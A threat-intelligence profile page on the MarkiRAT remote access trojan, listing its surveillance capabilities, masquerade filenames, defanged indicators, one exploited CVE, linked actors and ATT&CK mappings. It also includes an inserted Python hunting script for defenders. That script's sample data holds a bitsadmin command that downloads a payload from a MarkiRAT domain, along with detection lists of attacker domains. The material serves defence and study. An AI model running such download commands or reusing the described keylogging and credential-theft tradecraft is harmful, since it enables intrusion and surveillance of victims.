Mallory

MarkiRAT

Malware. Used by 2 actors. Exploits 1 CVE.

MarkiRAT is a custom remote access trojan/backdoor associated with the Iran-linked TAG-182 activity cluster and also reported in connection with the Iran-linked Ferocious Kitten threat group. The malware has been used in cyber-surveillance operations and provides broad collection and remote access capabilities.

Reported functionality includes retrieving the victim username, capturing all keystrokes, capturing clipboard contents, taking screenshots saved initially as "scr.jpg", searching the filesystem for targeted file types and credential stores, gathering information from the KeePass password manager, checking for the Telegram installation directory by enumerating files on disk, checking running processes for Kaspersky and Bitdefender antivirus products, and using the GetKeyboardLayout API to determine whether the compromised host keyboard is set to Persian. MarkiRAT can execute arbitrary or remote commands, store collected data locally in a created .nfo file, and exfiltrate staged data over its C2 channel, including staged exfiltration over HTTP(S).

The malware has masqueraded as update.exe and svehost.exe, and has also mimicked legitimate Telegram and Chrome files; one listed path is C:\Users\Public\AppData\Windows\svehost.exe. Supporting detection content also references BITSAdmin-based payload download activity tied to MarkiRAT, including use of /i.php?u= and /uploadx.php endpoints, and notes that it has been delivered under filenames such as YEPlayer.dll, YEMPlayer.zip, YEMPlayer.msi, Pis2rayVPN.msi, Pis2rayVPN.zip, and Pis2rayN.dll.
Observed infrastructure and indicators mentioned in the content include domains yeplayer[.]store, yemplayer[.]site, pis2ray[.]online, microsoft[.]comi-site[.]website, microsotf[.]comi-site[.]website; IPs 45[.]86[.]162[.]197, 46[.]30[.]191[.]105, 46[.]30[.]191[.]123, 89[.]144[.]145[.]237, 89[.]144[.]145[.]239, and 212[.]83[.]61[.]198; and sample SHA-256 hashes 13440348516ccee839675f6ac908dd1724ce1d28f92af92fdc7938740d2b7ec5, bb0c7ae4f12e5141480ee26f473636b07e836bb994ff3b2cfec93d4480da171b, and fa246327bed8fc5864827a8147b8b7aedb6246068259b8c97e82adb957315347.
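As an added defender's illustration (not code from the page or from Mallory), the following Python applies the indicators described above to constructed process-creation events: the BITSAdmin download endpoints, the listed domains, the delivery filenames and the svehost.exe masquerade path. The sample events and the non-MarkiRAT hostname are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation events (image path, command line); not real telemetry.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /transfer job1 /download /priority normal http://yeplayer.store/i.php?u=abc C:\Users\Public\YEPlayer.dll"),
    (r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /transfer upd /download https://updates.example-vendor.test/patch.msi C:\Temp\patch.msi"),
    (r"C:\Users\Public\AppData\Windows\svehost.exe", r"svehost.exe"),
    (r"C:\Program Files\Telegram Desktop\Telegram.exe", r"Telegram.exe"),
]

# Indicators taken from the write-up above (defanging brackets removed so they match).
MARKIRAT_DOMAINS = {"yeplayer.store", "yemplayer.site", "pis2ray.online",
                    "microsoft.comi-site.website", "microsotf.comi-site.website"}
MARKIRAT_URL_PATHS = ("/i.php", "/uploadx.php")
MARKIRAT_FILENAMES = {"yeplayer.dll", "yemplayer.zip", "yemplayer.msi",
                      "pis2rayvpn.msi", "pis2rayvpn.zip", "pis2rayn.dll"}
MASQUERADE_PATHS = {r"c:\users\public\appdata\windows\svehost.exe"}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

def score_event(image, cmdline):
    """Return the reasons this event matches MarkiRAT tradecraft; empty list if none."""
    reasons = []
    image_l, cmd_l = image.lower(), cmdline.lower()
    if image_l in MASQUERADE_PATHS:
        reasons.append("known MarkiRAT masquerade path: " + image)
    # BITSAdmin download activity: inspect every URL on the command line.
    if image_l.endswith(r"\bitsadmin.exe") and "/transfer" in cmd_l:
        for url in URL_RE.findall(cmdline):
            parsed = urlparse(url)
            if parsed.hostname and parsed.hostname.lower() in MARKIRAT_DOMAINS:
                reasons.append("BITS download from MarkiRAT domain " + parsed.hostname)
            if parsed.path.lower().startswith(MARKIRAT_URL_PATHS):
                reasons.append("BITS download hitting MarkiRAT endpoint " + parsed.path)
    # Delivery filenames, matched as whole names after a path separator or space.
    for name in MARKIRAT_FILENAMES:
        if re.search(r"(^|[\\/ ])" + re.escape(name) + r"\b", cmd_l):
            reasons.append("MarkiRAT delivery filename " + name)
    return reasons

def hunt(events):
    """Run score_event over (image, cmdline) pairs and return only the hits."""
    hits = []
    for img, cmd in events:
        reasons = score_event(img, cmd)
        if reasons:
            hits.append((img, cmd, reasons))
    return hits
```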


EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

CVE-2021-40444: Microsoft MSHTML Remote Code Execution Vulnerability

Over multiple years, the group developed and deployed a custom implant known as MarkiRAT that provides broad collection capabilities, keystroke and clipboard logging, screenshots, filesystem searches for targeted file types and credential stores, remote command execution, and staged exfiltration over HTTP(S).

via Picus Security blog (picussecurity.com)
THREAT ACTORS

Groups observed using it

2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

TAG-182

TAG-182’s malware scheme is likely one of the myriad tactics, techniques, and procedures (TTPs) used by these organizations... rule APT_IR_TAG182_MarkiRAT_2 ... description = "Track the main backdoor of TAG-182, MarkiRAT" ... title: MarkiRAT Malware Bitsadmin File Download ... description: Detects the use of bitsadmin to download a file from a remote URL by MarkiRAT malware used by Iran-Nexus TAG-182.

via Recorded Future blog (recordedfuture.com)
Ferocious Kitten

Over multiple years, the group developed and deployed a custom implant known as MarkiRAT that provides broad collection capabilities, keystroke and clipboard logging, screenshots, filesystem searches for targeted file types and credential stores, remote command execution, and staged exfiltration over HTTP(S).

via Picus Security blog (picussecurity.com)
MITRE ATT&CK

Techniques & procedures

22 distinct techniques documented for this family, organized by ATT&CK tactic.

Execution

3 techniques
T1059.003 Windows Command Shell (evidence: 3)

tags:
  - attack.t1197 # BITS Jobs
  - attack.t1059.003 # Command and Scripting Interpreter: Windows Command Shell

T1106 Native API (evidence: 1)

"ADVSTORESHELL is capable of starting a process using CreateProcess"; "build_downer has the ability to use the WinExec API"; "Aria-body has the ability to launch files using ShellExecute"

T1197 BITS Jobs (evidence: 3)

title: MarkiRAT Malware Bitsadmin File Download ... description: Detects the use of bitsadmin to download a file from a remote URL by MarkiRAT malware used by Iran-Nexus TAG-182. ... tags: - attack.t1197 # BITS Jobs

Persistence

3 techniques
T1197 BITS Jobs (evidence: 3)

title: MarkiRAT Malware Bitsadmin File Download ... description: Detects the use of bitsadmin to download a file from a remote URL by MarkiRAT malware used by Iran-Nexus TAG-182. ... tags: - attack.t1197 # BITS Jobs

T1547.001 Registry Run Keys / Startup Folder (evidence: 4)

The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder. Examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders.

T1547.009 Shortcut Modification (evidence: 1)

Privilege Escalation

2 techniques
T1547.001 Registry Run Keys / Startup Folder (evidence: 4)

The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder. Examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders.

T1547.009 Shortcut Modification (evidence: 1)

Stealth

3 techniques
T1036 Masquerading (evidence: 2)

During the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.

T1036.005 Match Legitimate Resource Name or Location (evidence: 1)

Akira has used legitimate names and locations for files to evade defenses.

T1197 BITS Jobs (evidence: 3)

title: MarkiRAT Malware Bitsadmin File Download ... description: Detects the use of bitsadmin to download a file from a remote URL by MarkiRAT malware used by Iran-Nexus TAG-182. ... tags: - attack.t1197 # BITS Jobs

Credential Access

3 techniques
T1056.001 Keylogging (evidence: 1)

T1555 Credentials from Password Stores (evidence: 1)

Fox Kitten has used scripts to access credential information from the KeePass database. Indrik Spider has accessed and exported passwords from password managers. Proton gathers credentials in files for 1password. TrickBot can steal passwords from the KeePass open source password manager.

T1555.005 Password Managers (evidence: 1)

LAPSUS$ has accessed local password managers and databases to obtain further credentials from a compromised network. Scattered Spider has searched for credentials in password vaults and Privileged Access Management (PAM) solutions including HashiCorp Vault. Storm-0501 has stolen credentials contained in the password manager Keepass by utilizing Find-KeePassConfig.ps1.

Discovery

6 techniques
T1033 System Owner/User Discovery (evidence: 4)

The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.

T1057 Process Discovery (evidence: 2)

The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.

T1082 System Information Discovery (evidence: 4)

The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."

T1083 File and Directory Discovery (evidence: 4)

The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").

T1518 Software Discovery (evidence: 2)

"Bazar can query the Registry for installed applications." / "BRONZE BUTLER has used tools to enumerate software installed on an infected host." / "LightSpy ... enumerate the Applications folder to collect the bundle name, bundle identifier, and version information..." / "Volt Typhoon has queried the Registry on compromised systems for information on installed software."

T1614.001 System Language Discovery (evidence: 2)

Avaddon checks for specific keyboard layouts and OS languages to avoid targeting Commonwealth of Independent States (CIS) entities... Bazar can perform a check to ensure that the operating system's keyboard and language settings are not set to Russian... Clop has checked the keyboard language using the GetKeyboardLayout() function... Ryuk has been observed to query the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language and the value InstallLanguage.

Collection

5 techniques
T1005 Data from Local System (evidence: 1)

T1056.001 Keylogging (evidence: 1)

T1074 Data Staged (evidence: 1)

The content repeatedly describes adversaries and malware storing collected data, command output, credentials, archives, or files in local temporary folders, working directories, hidden directories, registry locations, recycle bins, or specific files prior to exfiltration.

T1113 Screen Capture (evidence: 1)

"Agent Tesla can capture screenshots of the victim’s desktop"; "AppleSeed can take screenshots on a compromised host"; "APT28 has used tools to take screenshots from victims"; "Cobalt Strike's Beacon payload is capable of capturing screenshots"; "PowerSploit's Get-TimedScreenshot Exfiltration module can take screenshots at regular intervals"; "Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop"

T1115 Clipboard Data (evidence: 3)

Agent Tesla can steal data from the victim’s clipboard. APT38 used a Trojan called KEYLIME to collect data from the clipboard. APT39 has used tools capable of stealing contents of the clipboard.

Command and Control

1 technique
T1071.001 Web Protocols (evidence: 3)

The content repeatedly describes threat actors and malware using HTTP and HTTPS for command and control, such as: "Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests."

Exfiltration

1 technique
T1041 Exfiltration Over C2 Channel (evidence: 5)

Many entries state malware or actors can upload, transfer, send, or exfiltrate files from compromised hosts to command-and-control servers or attacker infrastructure.

INDICATORS OF COMPROMISE

IOCs tracked for this family

56 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network: 40 tracked. IPs, domains, and DNS infrastructure linked to this family.

Hashes: 15 tracked. File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other: 1 tracked. Other indicator types observed in public reporting.

ACTIVITY FEED

Recent activity

27 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
